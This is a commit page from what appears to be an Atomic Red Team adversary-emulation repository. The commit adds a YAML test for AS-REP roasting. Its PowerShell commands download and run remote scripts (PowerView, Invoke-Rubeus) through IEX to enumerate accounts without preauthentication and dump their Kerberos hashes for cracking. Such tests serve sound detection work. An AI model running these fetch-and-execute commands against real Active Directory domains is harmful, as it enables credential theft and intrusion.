security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update T1558.004.yaml (#1961)

Browse Source 
PowerSharpPack - Kerberoasting Using Rubeus asreproast technique via function of WinPwn

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
tlor89
2022-05-12 18:33:22 -05:00
committed by GitHub
parent 3ca876233d
commit 8a910c5ed2
1 changed files with 10 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1558.004/T1558.004.yaml
+10 -1
View File
@@ -56,4 +56,13 @@ atomic_tests:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
name: powershell
name: powershell
- name: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus
description: PowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn
supported_platforms:
- windows
executor:
command: |-
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')
Invoke-Rubeus -Command "asreproast /format:hashcat /nowrap"
name: powershell